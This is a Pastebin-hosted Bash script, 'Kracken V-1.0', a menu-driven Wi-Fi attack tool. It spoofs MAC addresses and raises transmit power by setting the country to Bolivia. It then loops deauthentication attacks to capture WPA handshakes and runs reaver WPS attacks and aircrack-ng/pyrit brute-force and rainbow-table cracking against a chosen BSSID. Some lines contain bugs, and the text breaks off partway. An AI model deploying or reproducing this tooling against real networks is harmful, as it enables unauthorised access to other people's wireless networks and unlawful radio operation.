Advertisement
SH1NU11b1

The Kracken

Oct 21st, 2015
186
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 28.09 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3.  
  4.  
  5. #Configuration:
  6.  
  7.   HANDSHAKE='/root/Handshakes/HandShake*.cap'
  8.   WORDLIST='/usr/share/wordlists/rockyou.txt'
  9.   COWPATTY='/root/Rainbow/cowpatty'
  10.   AIROLIB='/root/Rainbow/airolib'
  11.   MONITER=mon0
  12.  
  13. #End configuration
  14.  
  15.     clear
  16.    
  17.   echo "***********[Kracken V-1.0]***********"
  18.   echo "*                                   *"
  19.   echo "*  Wrtten by: thisguysayswht        *"
  20.   echo "*                                   *"
  21.   echo "**************[WARNING]**************"
  22.   echo "*                                   *"
  23.   echo "*  This script can cause damage to  *"
  24.   echo "*  your hardware and/or network. I  *"
  25.   echo "*  am not responsible for any down  *"
  26.   echo "*  time or damages caused. You are  *"
  27.   echo "*  responsible for scripts you run  *"
  28.   echo "*                                   *"
  29.   echo "********[Use at your own risk]*******"
  30.   echo ""
  31.   echo ""
  32.   echo "======[Press enter to continue]======"
  33.  
  34.     read START
  35.  
  36.       if [[ $START == "" ]]; then
  37.    
  38.     sleep 1
  39.     clear
  40.      
  41.       fi
  42.  
  43.       while true
  44.       do
  45.    
  46.     clear
  47.    
  48.   echo "*******************[Main Menu]**********************"
  49.   echo "*                                                  *"
  50.   echo "* (1) View handshakes                              *"
  51.   echo "* (2) View interfaces                              *"
  52.   echo "* (3) Spoof MAC                                    *"
  53.   echo "* (4) Boost wireless card                          *"
  54.   echo "* (5) Start moniter interface                      *"
  55.   echo "* (6) Run wash                                     *"
  56.   echo "* (7) Run airodump                                 *"
  57.   echo "* (8) Capture handshakes                           *"
  58.   echo "* (9) Create rainbow table                         *"
  59.   echo "* (10) Run reaver                                  *"
  60.   echo "* (11) Run aircrack-ng                             *"
  61.   echo "* (12) Run pyrit                                   *"
  62.   echo "* (13) Restore wireless interface                  *"
  63.   echo "* (14) Bruteforce calculator                       *"
  64.   echo "*                                                  *"
  65.   echo "* (15) Exit                                        *"
  66.   echo "*                                                  *"
  67.   echo "****************************************************"
  68.   echo ""
  69.  
  70.     read n
  71.  
  72.       case $n in
  73.      
  74. 1)
  75.  
  76.     xterm -hold -e "aircrack-ng $HANDSHAKE" & ;;
  77.      
  78. 2)
  79.  
  80.     xterm -hold -e iwconfig & ;;
  81.      
  82. 3)
  83.  
  84.     clear
  85.  
  86.   echo "*************************************************"
  87.   echo "* Please select a wireless interface from below *"
  88.   echo "*************************************************"
  89.   echo ""
  90.  
  91.     iwconfig
  92.    
  93.   echo ""
  94.   echo "*************************************************"
  95.   echo ""
  96.      
  97.     read WIRELESS
  98.    
  99.       [[ $WIRELESS == "" ]]
  100.      
  101.     sleep 1
  102.     clear
  103.      
  104.   echo "Shutting down $WIRELESS..."
  105.   echo ""
  106.  
  107.     sleep 1
  108.    
  109.     ifconfig $WIRELESS down
  110.      
  111.   echo "Changing to random MAC..."
  112.   echo ""
  113.  
  114.     sleep 1
  115.    
  116.     macchanger -r $WIRELESS
  117.      
  118.   echo""    
  119.   echo "Bringing spoffed interface up..."
  120.   echo ""
  121.    
  122.     ifconfig $WIRELESS up
  123.    
  124.     sleep 3  
  125.     clear ;;
  126.    
  127. 4)
  128.  
  129.     clear
  130.    
  131.   echo ""
  132.   echo "*****************[WARNING]********************"
  133.   echo "*                                            *"
  134.   echo "* Setting your wireless card at a power      *"
  135.   echo "* higher than the OEM spec can damage your   *"
  136.   echo "* card.                                      *"
  137.   echo "*                                            *"
  138.   echo "**********************************************"
  139.   echo ""
  140.   echo ""
  141.   echo "========Do you wish to proceed[y/n]?=========="
  142.   echo ""
  143.  
  144.     read START
  145.  
  146.       if [[ $START == "y" ]]; then
  147.    
  148.     sleep 1
  149.     clear
  150.    
  151.   echo "*************************************************"
  152.   echo "* Please select a wireless interface from below *"
  153.   echo "*************************************************"
  154.   echo ""
  155.  
  156.     iwconfig
  157.    
  158.   echo ""
  159.   echo "*************************************************"
  160.   echo ""
  161.  
  162.     read WIRELESS0
  163.    
  164.       [[ $WIRELESS0 == "" ]]
  165.      
  166.     sleep 1
  167.     clear
  168.  
  169.  
  170.   echo "Setting country to BO (Bolivia)..."
  171.   echo ""
  172.  
  173.     sleep 1
  174.    
  175.       iw reg set BO
  176.  
  177.   echo "Boosting power on $WIRELESS0..."
  178.   echo ""
  179.  
  180.       iwconfig $WIRELESS0 txpower 30
  181.  
  182.     sleep 3
  183.    
  184.       else
  185.      
  186.     echo ""
  187.     echo "Returning to script..."
  188.    
  189.     sleep 3
  190.    
  191.       fi;;
  192.      
  193. 5)
  194.  
  195.     clear
  196.      
  197.   echo "*************************************************"
  198.   echo "* Please select a wireless interface from below *"
  199.   echo "*************************************************"
  200.   echo ""
  201.      
  202.     iwconfig
  203.    
  204.   echo ""
  205.   echo "*************************************************"
  206.   echo ""
  207.  
  208.     read WIRELESS2
  209.       [[ $WIRELESS2 == "" ]]
  210.      
  211.     sleep 1
  212.     clear
  213.    
  214.   echo "Starting interface on $WIRELESS2..."
  215.  
  216.     sleep 1
  217.    
  218.     airmon-ng start $WIRELESS2
  219.      
  220.     sleep 3
  221.     clear ;;
  222.    
  223. 6)
  224.  
  225.       xterm -hold -e wash -i $MONITER -C & ;;
  226.      
  227. 7)
  228.  
  229.       xterm -hold -e airodump-ng $MONITER & ;;
  230.      
  231. 8)
  232.  
  233.     clear
  234.    
  235.       cd ~
  236.    
  237.     mkdir Handshakes &> /dev/null
  238.      
  239.   echo "**********************************"
  240.   echo "* Please enter the network BSSID *"
  241.   echo "**********************************"
  242.   echo ""
  243.  
  244.     read BSSID
  245.       [[ $BSSID == "" ]]
  246.      
  247.     clear
  248.    
  249.   echo "************************************"
  250.   echo "* Please enter the network channel *"
  251.   echo "************************************"
  252.   echo ""
  253.  
  254.     read CHNEL
  255.       [[ $CHNEL == "" ]]
  256.      
  257.     xterm -hold -e "airodump-ng --ig -w Handshakes/HandShake -c $CHNEL --bssid $BSSID $MONITER" &
  258.      
  259.     sleep 5 &&
  260.    
  261.     xterm -hold -e "while true; do sleep 5; aireplay-ng -0 5 -q 2 --ig -a $BSSID $MONITER; done" & ;;
  262.    
  263. 9)
  264.        
  265.           while true
  266.           do
  267.        
  268.         clear
  269.        
  270.       echo "****************[Rainbow tables]********************"
  271.       echo "*                                                  *"
  272.       echo "* (1) View handshakes                              *"
  273.       echo "* (2) Import rockyou.txt                           *"
  274.       echo "* (3) Import wordlist                              *"
  275.       echo "* (4) Import custom crunch                         *"
  276.       echo "* (5) Add ESSID                                    *"
  277.       echo "* (6) Remove ESSID                                 *"
  278.       echo "* (7) View ESSIDs                                  *"
  279.       echo "* (8) Create rainbow table                         *"
  280.       echo "* (9) View rainbow tables                          *"
  281.       echo "* (10) Export to airolib                           *"
  282.       echo "* (11) Export to cowpatty                          *"
  283.       echo "*                                                  *"
  284.       echo "* (12) Return to main script                       *"
  285.       echo "*                                                  *"
  286.       echo "****************************************************"
  287.       echo ""
  288.  
  289.         read n
  290.        
  291.           case $n in
  292.        
  293.     1)
  294.    
  295.         clear
  296.          
  297.           xterm -hold -e aircrack-ng $HANDSHAKE & ;;
  298.          
  299.     2)
  300.    
  301.         clear
  302.        
  303.           gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
  304.          
  305.         sleep 2
  306.        
  307.           xterm -hold -e "pyrit -i $WORDLIST import_passwords" & ;;
  308.    
  309.     3)
  310.    
  311.         clear
  312.        
  313.       echo "***********************************************"
  314.       echo "* Enter full path to password file for import *"
  315.       echo "***********************************************"
  316.       echo ""
  317.      
  318.         read READES
  319.         [[ $READES == "" ]]
  320.        
  321.           xterm -hold -e "pyrit -i '$READES' import_passwords" & ;;
  322.          
  323.     4)
  324.    
  325.         clear
  326.        
  327.       echo "****************************************************"
  328.       echo "* What arguments would you like to pass to crunch? *"
  329.       echo "****************************************************"
  330.       echo ""
  331.      
  332.         read CRUNCH
  333.           [[ $CRUNCH == "" ]]
  334.          
  335.         xterm -hold -e "crunch $CRUNCH|pyrit -i- import_passwords" & ;;
  336.    
  337.     5)
  338.    
  339.         clear
  340.        
  341.       echo "***************"
  342.       echo "* Enter ESSID *"
  343.       echo "***************"
  344.       echo ""
  345.  
  346.         read READES
  347.           [[ $READES == "" ]]
  348.          
  349.         xterm -hold -e "pyrit -e '$READES' create_essid" & ;;
  350.        
  351.     6)
  352.    
  353.         clear
  354.        
  355.       echo "***************"
  356.       echo "* Enter ESSID *"
  357.       echo "***************"
  358.       echo ""
  359.  
  360.         read READES
  361.           [[ $READES == "" ]]
  362.          
  363.         xterm -hold -e "pyrit -e '$READES' delete_essid" & ;;
  364.  
  365.     7)
  366.    
  367.         clear
  368.        
  369.         xterm -hold -e "pyrit list_essids" & ;;
  370.        
  371.     8)
  372.    
  373.         clear
  374.        
  375.       echo "***************"
  376.       echo "* Enter BSSID *"
  377.       echo "***************"
  378.       echo ""
  379.      
  380.         read READBS
  381.           [[ $READBS == "" ]]
  382.        
  383.         xterm -hold -e "pyrit -i- -b $READBS batch" & ;;
  384.        
  385.     9)
  386.    
  387.         clear
  388.        
  389.         xterm -hold -e "pyrit eval" & ;;
  390.        
  391.     10)
  392.    
  393.         clear
  394.        
  395.           cd ~
  396.          
  397.         mkdir Rainbow &> /dev/null
  398.        
  399.         xterm -hold -e "pyrit -o $AIROLIB export_hashdb" & ;;
  400.        
  401.     11)
  402.    
  403.       clear
  404.      
  405.        cd ~
  406.          
  407.       mkdir Rainbow &> /dev/null
  408.        
  409.         xterm -hold -e "pyrit -o $COWPATTY export_hashdb" & ;;
  410.      
  411.        
  412.     12)
  413.    
  414.         clear
  415.         break;;
  416.        
  417.     *)
  418.    
  419.         clear
  420.        
  421.       echo "*******************************************"
  422.       echo "* Invalid option. Press any key to return *"
  423.       echo "*******************************************"
  424.    
  425.         read -p "";;
  426.    
  427.           esac
  428.      
  429.         sleep 1
  430.    
  431.           done;;
  432.      
  433. 10)
  434.  
  435.     clear
  436.    
  437.   echo "****************************************************"
  438.   echo "* Enter BSSID you would like to attack with reaver *"
  439.   echo "****************************************************"
  440.   echo ""
  441.  
  442.     read RBSSID
  443.       [[ $RBSSID == "" ]]
  444.      
  445.     sleep 1
  446.     clear
  447.    
  448.   echo "***************************************************************"
  449.   echo "* Enter arguments you would like to pass to reaver [optional] *"
  450.   echo "***************************************************************"
  451.   echo ""
  452.  
  453.     read REAVERA
  454.       [[ $REAVERA == "" ]]
  455.      
  456.   echo "Starting reaver attack..."
  457.  
  458.     sleep 3
  459.     clear
  460.    
  461.      xterm -hold -e "reaver -i $MONITER -b $RBSSID $REAVERA -vv" & ;;
  462.      
  463. 11)
  464.      
  465.           while true
  466.           do
  467.        
  468.         clear
  469.        
  470.       echo "*****************[Aircrack-ng]**********************"
  471.       echo "*                                                  *"
  472.       echo "* (1) View handshakes                              *"
  473.       echo "* (2) Use rockyou.txt                              *"
  474.       echo "* (3) Bruteforce 8 numeric                         *"
  475.       echo "* (4) Bruteforce 9 numeric                         *"
  476.       echo "* (5) Bruteforce 10 numeric                        *"
  477.       echo "* (6) Bruteforce 8 a-z                             *"
  478.       echo "* (7) Bruteforce 8 A-Z                             *"
  479.       echo "* (8) Bruteforce 8 a-z + numeric                   *"
  480.       echo "* (9) Bruteforce 8 A-Z + numeric                   *"
  481.       echo "* (10) Bruteforce 8 a-z + A-Z                      *"
  482.       echo "* (11) Bruteforce custom                           *"
  483.       echo "* (12) Specify wordlist                            *"
  484.       echo "* (13) Use rainbow table                           *"
  485.       echo "*                                                  *"
  486.       echo "* (14) Exit to main script                         *"
  487.       echo "*                                                  *"
  488.       echo "****************************************************"
  489.       echo ""
  490.  
  491.         read n
  492.        
  493.           case $n in
  494.        
  495.     1)
  496.  
  497.         xterm -hold -e aircrack-ng $HANDSHAKE & ;;
  498.  
  499.     2)
  500.  
  501.         clear
  502.        
  503.       echo "Decompressing rockyou.txt..."
  504.       echo ""
  505.      
  506.         gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
  507.         sleep 1
  508.        
  509.       echo "Starting attack..."
  510.       echo ""
  511.      
  512.         sleep 3
  513.        
  514.         xterm -hold -e aircrack-ng -w $WORDLIST $HANDSHAKE & ;;
  515.  
  516.     3)
  517.  
  518.         clear
  519.        
  520.       echo "*****************************************************"
  521.       echo "* Please enter the network BSSID you wish to attack *"
  522.       echo "*****************************************************"
  523.       echo ""
  524.      
  525.         read FKUAC
  526.           [[ $FKUAC == "" ]]
  527.      
  528.         sleep 1
  529.      
  530.       echo "Starting bruteforce 8 numeric"
  531.       echo ""
  532.      
  533.         xterm -hold -e "crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
  534.  
  535.     4)
  536.  
  537.         clear
  538.        
  539.       echo "*****************************************************"
  540.       echo "* Please enter the network BSSID you wish to attack *"
  541.       echo "*****************************************************"
  542.       echo ""
  543.      
  544.         read FKUAC
  545.           [[ $FKUAC == "" ]]
  546.          
  547.       echo "Starting bruteforce 9 numeric"
  548.       echo ""
  549.      
  550.         xterm hold -e "crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
  551.  
  552.     5)
  553.         clear
  554.        
  555.       echo "*****************************************************"
  556.       echo "* Please enter the network BSSID you wish to attack *"
  557.       echo "*****************************************************"
  558.       echo ""
  559.      
  560.         read FKUAC
  561.           [[ $FKUAC == "" ]]
  562.          
  563.       echo "Starting bruteforce 10 numeric"
  564.       echo ""
  565.      
  566.         xterm -hold -e "crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
  567.        
  568.     6)
  569.        
  570.         clear
  571.        
  572.       echo "*****************************************************"
  573.       echo "* Please enter the network BSSID you wish to attack *"#
  574.       echo "*****************************************************"
  575.       echo ""
  576.      
  577.         read FKUAC
  578.           [[ $FKUAC == "" ]]
  579.          
  580.       echo "Starting bruteforce 8 a-z"
  581.       echo ""
  582.      
  583.         xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
  584.  
  585.     7)
  586.  
  587.         clear
  588.        
  589.       echo "*****************************************************"
  590.       echo "* Please enter the network BSSID you wish to attack *"
  591.       echo "*****************************************************"
  592.       echo ""#
  593.      
  594.         read FKUAC
  595.           [[ $FKUAC == "" ]]
  596.          
  597.       echo "Starting bruteforce 8 A-Z"
  598.       echo ""
  599.      
  600.         xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
  601.  
  602.     8)
  603.  
  604.         clear
  605.        
  606.       echo "*****************************************************"
  607.       echo "* Please enter the network BSSID you wish to attack *"
  608.       echo "*****************************************************"
  609.       echo ""#
  610.      
  611.         read FKUAC
  612.           [[ $FKUAC == "" ]]
  613.          
  614.       echo "Starting bruteforce 8 a-z numeric"
  615.       echo ""
  616.      
  617.         xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC #$HANDSHAKE" & ;;
  618.  
  619.     9)
  620.  
  621.         clear
  622.        
  623.       echo "*****************************************************"
  624.       echo "* Please enter the network BSSID you wish to attack *"
  625.       echo "*****************************************************"
  626.       echo ""
  627.      
  628.         read FKUAC
  629.           [[ $FKUAC == "" ]]
  630.           #
  631.       echo "Starting bruteforce 8 A-Z numeric"
  632.       echo ""
  633.      
  634.         xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
  635.  
  636.     10)
  637.  
  638.         clear
  639.        
  640.       echo "*****************************************************"
  641.       echo "* Please enter the network BSSID you wish to attack *"
  642.       echo "*****************************************************"
  643.       echo ""
  644.      
  645.         read FKUAC
  646.           [[ $FKUAC == "" ]]
  647.           #
  648.       echo "Starting bruteforce 8 a-z A-Z"
  649.       echo ""
  650.      
  651.         xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
  652.  
  653.     11)
  654.  
  655.         clear
  656.  
  657.       echo "*****************************************************"
  658.       echo "* Please enter the network BSSID you wish to attack *"
  659.       echo "*****************************************************"
  660.       echo ""
  661.      
  662.         read FKUAC
  663.           [[ $FKUAC == "" ]]
  664.          
  665.         clear
  666.        
  667.       echo "****************************************************"    
  668.       echo "* What arguments would you like to pass to crunch? *"
  669.       echo "****************************************************"
  670.       echo ""
  671.      
  672.         read CRUNCH
  673.           [[ $CRUNCH == "" ]]
  674.          
  675.       echo ""
  676.       echo "Starting custom bruteforce attack"
  677.       echo ""
  678.      
  679.         xterm -hold -e "crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
  680.        
  681.     12)
  682.    
  683.         clear
  684.        
  685.       echo "*****************************************************"
  686.       echo "* Please enter the network BSSID you wish to attack *"
  687.       echo "*****************************************************"
  688.       echo ""
  689.      
  690.         read FKUAC
  691.           [[ $FKUAC == "" ]]
  692.          
  693.         clear
  694.          
  695.       echo "**********************************************"
  696.       echo "* Please enter the full path to the wordlist *"
  697.       echo "**********************************************"
  698.       echo ""
  699.      
  700.         read WCUST
  701.           [[ $WCUST == "" ]]
  702.          
  703.       echo ""
  704.       echo "Attacking with $WCUST"
  705.       echo ""
  706.          
  707.         xterm -hold -e "aircrack-ng -a 2 -w '$WCUST' -b $FKUAC $HANDSHAKE" & ;;
  708.        
  709.     13)
  710.    
  711.         clear
  712.        
  713.       echo "*****************************************************"
  714.       echo "* Please enter the network BSSID you wish to attack *"
  715.       echo "*****************************************************"
  716.       echo ""
  717.      
  718.         read FKUAC
  719.           [[ $FKUAC == "" ]]
  720.          
  721.       echo ""
  722.       echo "Attacking with airolib hash table"
  723.       echo ""
  724.      
  725.         xterm -hold -e "aircrack-ng -r '$AIROLIB' -b $FKUAC $HANDSHAKE" & ;;
  726.        
  727.     14)
  728.      
  729.         clear
  730.         break;;
  731.        
  732.     *)
  733.      
  734.         clear
  735.      
  736.       echo "*******************************************"
  737.       echo "* Invalid option. Press any key to return *"
  738.       echo "*******************************************"
  739.    
  740.         read -p ""
  741.        
  742.         esac
  743.      
  744.     sleep 1
  745.    
  746.         done;;
  747.  
  748.          
  749. 12)
  750.      
  751.           while true
  752.           do
  753.          
  754.         clear
  755.        
  756.       echo "*********************[Pyrit]************************"
  757.       echo "*                                                  *"
  758.       echo "* (1) View handshakes                              *"
  759.       echo "* (2) Use rockyou.txt                              *"
  760.       echo "* (3) Bruteforce 8 numeric                         *"
  761.       echo "* (4) Bruteforce 9 numeric                         *"
  762.       echo "* (5) Bruteforce 10 numeric                        *"
  763.       echo "* (6) Bruteforce 8 a-z                             *"
  764.       echo "* (7) Bruteforce 8 A-Z                             *"
  765.       echo "* (8) Bruteforce 8 a-z + numeric                   *"
  766.       echo "* (9) Bruteforce 8 A-Z + numeric                   *"
  767.       echo "* (10) Bruteforce 8 a-z + A-Z                      *"
  768.       echo "* (11) Bruteforce custom                           *"
  769.       echo "* (12) Specify wordlist                            *"
  770.       echo "* (13) Use rainbow table                           *"
  771.       echo "* (14) Benchmark pyrit                             *"
  772.       echo "*                                                  *"
  773.       echo "* (15) Exit to main script                         *"
  774.       echo "*                                                  *"
  775.       echo "****************************************************"
  776.       echo ""
  777.  
  778.         read n
  779.        
  780.           case $n in
  781.        
  782.     1)
  783.  
  784.         xterm -hold -e aircrack-ng $HANDSHAKE & ;;
  785.  
  786.     2)
  787.  
  788.         clear
  789.        
  790.       echo "*****************************************************"
  791.       echo "* Please enter the network BSSID you wish to attack *"
  792.       echo "*****************************************************"
  793.       echo ""
  794.      
  795.         read PYRITB
  796.           [[ $PYRITB == "" ]]
  797.        
  798.       echo "Decompressing rockyou.txt..."
  799.       echo ""
  800.      
  801.         gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
  802.         sleep 2
  803.        
  804.       echo "Starting attack..."
  805.       echo ""
  806.      
  807.         sleep 3
  808.        
  809.         xterm -hold -e  "pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  810.  
  811.     3)
  812.    
  813.         clear
  814.        
  815.       echo "*****************************************************"
  816.       echo "* Please enter the network BSSID you wish to attack *"
  817.       echo "*****************************************************"
  818.       echo ""
  819.      
  820.         read PYRITB
  821.           [[ $PYRITB == "" ]]
  822.          
  823.       echo "Starting bruteforce 8 numeric"
  824.       echo ""
  825.      
  826.         xterm -hold -e "crunch 8 8 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  827.  
  828.     4)
  829.  
  830.         clear
  831.        
  832.       echo "*****************************************************"
  833.       echo "* Please enter the network BSSID you wish to attack *"
  834.       echo "*****************************************************"
  835.       echo ""
  836.      
  837.         read PYRITB
  838.           [[ $PYRITB == "" ]]
  839.          
  840.       echo "Starting bruteforce 9 numeric"
  841.       echo ""
  842.      
  843.         xterm -hold -e "crunch 9 9 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  844.  
  845.     5)
  846.         clear
  847.        
  848.       echo "*****************************************************"
  849.       echo "* Please enter the network BSSID you wish to attack *"
  850.       echo "*****************************************************"
  851.       echo ""
  852.      
  853.         read PYRITB
  854.           [[ $PYRITB == "" ]]
  855.          
  856.       echo "Starting bruteforce 10 numeric"
  857.       echo ""
  858.      
  859.         xterm -hold -e "crunch 10 10 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  860.        
  861.     6)
  862.        
  863.         clear
  864.        
  865.       echo "*****************************************************"
  866.       echo "* Please enter the network BSSID you wish to attack *"
  867.       echo "*****************************************************"
  868.       echo ""
  869.      
  870.         read PYRITB
  871.           [[ $PYRITB == "" ]]
  872.          
  873.       echo "Starting bruteforce 8 a-z"
  874.       echo ""
  875.      
  876.         xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  877.  
  878.     7)
  879.  
  880.         clear
  881.        
  882.       echo "*****************************************************"
  883.       echo "* Please enter the network BSSID you wish to attack *"
  884.       echo "*****************************************************"
  885.       echo ""
  886.      
  887.         read PYRITB
  888.           [[ $PYRITB == "" ]]
  889.          
  890.       echo "Starting bruteforce 8 A-Z"
  891.       echo ""
  892.      
  893.         xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  894.  
  895.     8)
  896.  
  897.         clear
  898.        
  899.       echo "*****************************************************"
  900.       echo "* Please enter the network BSSID you wish to attack *"
  901.       echo "*****************************************************"
  902.       echo ""
  903.      
  904.         read PYRITB
  905.           [[ $PYRITB == "" ]]
  906.          
  907.       echo "Starting bruteforce 8 a-z numeric"
  908.       echo ""
  909.      
  910.         xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  911.  
  912.     9)
  913.  
  914.         clear
  915.        
  916.       echo "*****************************************************"
  917.       echo "* Please enter the network BSSID you wish to attack *"
  918.       echo "*****************************************************"
  919.       echo ""
  920.      
  921.         read PYRITB
  922.           [[ $PYRITB == "" ]]
  923.          
  924.       echo "Starting bruteforce 8 A-Z numeric"
  925.       echo ""
  926.      
  927.         xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  928.  
  929.     10)
  930.  
  931.         clear
  932.        
  933.       echo "*****************************************************"
  934.       echo "* Please enter the network BSSID you wish to attack *"
  935.       echo "*****************************************************"
  936.       echo ""
  937.      
  938.         read PYRITB
  939.           [[ $PYRITB == "" ]]
  940.          
  941.       echo "Starting bruteforce 8 a-z A-Z"
  942.       echo ""
  943.      
  944.         xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  945.  
  946.     11)
  947.  
  948.         clear
  949.        
  950.       echo "*****************************************************"
  951.       echo "* Please enter the network BSSID you wish to attack *"
  952.       echo "*****************************************************"
  953.       echo ""
  954.      
  955.         read PYRITB
  956.           [[ $PYRITB == "" ]]
  957.          
  958.         clear
  959.        
  960.       echo "****************************************************"    
  961.       echo "* What arguments would you like to pass to crunch? *"
  962.       echo "****************************************************"
  963.       echo ""
  964.      
  965.         read PYRITB
  966.           [[ $PYRITB == "" ]]
  967.          
  968.       echo ""
  969.       echo "Starting custom bruteforce attack"
  970.       echo ""
  971.      
  972.         xterm -hold -e "crunch $CRUNCH|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  973.        
  974.     12)
  975.    
  976.         clear
  977.        
  978.       echo "*****************************************************"
  979.       echo "* Please enter the network BSSID you wish to attack *"
  980.       echo "*****************************************************"
  981.       echo ""
  982.      
  983.         read PYRITB
  984.           [[ $PYRITB == "" ]]
  985.          
  986.         clear
  987.          
  988.       echo "**********************************************"
  989.       echo "* Please enter the full path to the wordlist *"
  990.       echo "**********************************************"
  991.       echo ""
  992.      
  993.         read WCUST
  994.           [[ $WCUST == "" ]]
  995.          
  996.       echo ""
  997.       echo "Attacking with $WCUST"
  998.       echo ""
  999.          
  1000.         xterm -hold -e "pyrit -i '$WCUST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
  1001.        
  1002.     13)
  1003.    
  1004.         clear
  1005.        
  1006.       echo "*****************************************************"
  1007.       echo "* Please enter the network BSSID you wish to attack *"
  1008.       echo "*****************************************************"
  1009.       echo ""
  1010.      
  1011.         read PYRITB
  1012.           [[ $PYRITB == "" ]]
  1013.      
  1014.       echo ""
  1015.       echo "Attacking with rainbow table"
  1016.       echo ""
  1017.      
  1018.         xterm -hold -e "pyrit -r '$HANDSHAKE' -b '$PYRITB' attack_db" & ;;
  1019.      
  1020.     14)
  1021.    
  1022.         clear
  1023.        
  1024.         xterm -hold -e "pyrit benchmark" & ;;
  1025.        
  1026.     15)
  1027.      
  1028.         clear
  1029.         break;;
  1030.        
  1031.     *)
  1032.      
  1033.         clear
  1034.      
  1035.       echo "*******************************************"
  1036.       echo "* Invalid option. Press any key to return *"
  1037.       echo "*******************************************"
  1038.    
  1039.         read -p ""
  1040.        
  1041.       esac
  1042.      
  1043.     sleep 1
  1044.    
  1045.       done;;
  1046.      
  1047. 13)
  1048.  
  1049.     clear
  1050.  
  1051.   echo "*************************************************"
  1052.   echo "* Please select a wireless interface from below *"
  1053.   echo "*************************************************"
  1054.   echo ""
  1055.      
  1056.     iwconfig
  1057.    
  1058.   echo ""
  1059.   echo "*************************************************"
  1060.   echo ""
  1061.  
  1062.     read WIRELESS3
  1063.       [[ $WIRELESS3 == "" ]]
  1064.    
  1065.     clear
  1066.    
  1067.   echo "Resetting country..."
  1068.   echo ""
  1069.  
  1070.     sleep 1
  1071.  
  1072.     iw reg set BO
  1073.    
  1074.   echo "Resetting power..."
  1075.   echo ""
  1076.  
  1077.     iwconfig $WIRELESS3 txpower 20
  1078.  
  1079.     sleep 1
  1080.    
  1081.   echo "Disabling moniter mode..."
  1082.   echo ""
  1083.  
  1084.     sleep 1
  1085.    
  1086.     airmon-ng stop $MONITER
  1087.    
  1088.   echo "Shutting down main wireless interface..."
  1089.   echo ""
  1090.  
  1091.     sleep 1
  1092.    
  1093.     ifconfig $WIRELESS3 down
  1094.    
  1095.   echo "Restoring perment MAC..."
  1096.   echo ""
  1097.  
  1098.     sleep 1
  1099.    
  1100.     macchanger -p $WIRELESS3
  1101.    
  1102.   echo "Bringing main wireless interface back up..."
  1103.   echo ""
  1104.  
  1105.     sleep 1
  1106.    
  1107.     ifconfig $WIRELESS3 up
  1108.    
  1109.   echo "Wireless interface restored"
  1110.   echo ""
  1111.  
  1112.     sleep 3;;
  1113.    
  1114. 14)
  1115.  
  1116.     clear
  1117.    
  1118.   echo "*************************"
  1119.   echo "* Enter keys per second *"
  1120.   echo "*************************"
  1121.   echo ""
  1122.    
  1123.     read KPS
  1124.       [[ $KPS == "" ]]
  1125.      
  1126.     clear
  1127.  
  1128.   echo "*************************"
  1129.   echo "* Enter wordlist length *"
  1130.   echo "*************************"
  1131.   echo ""
  1132.  
  1133.     read WLL
  1134.       [[ $WLL == "" ]]
  1135.  
  1136.     ((A=$WLL/$KPS))
  1137.    
  1138.     ((B=$A/60))
  1139.    
  1140.     ((C=$B/60))
  1141.    
  1142.     ((D=$C/24))
  1143.    
  1144.     ((E=$D/7))
  1145.    
  1146.     ((F=$E/52))
  1147.    
  1148.     clear
  1149.    
  1150.   echo "****************************"  
  1151.   echo "* Bruteforce time estimate *"
  1152.   echo "****************************"
  1153.   echo ""
  1154.   echo ""
  1155.  
  1156.   echo "SECONDS: $A"
  1157.   echo ""
  1158.   echo "MINUTES: $B"
  1159.   echo ""
  1160.   echo "HOURS: $C"
  1161.   echo ""
  1162.   echo "DAYS: $D"
  1163.   echo ""
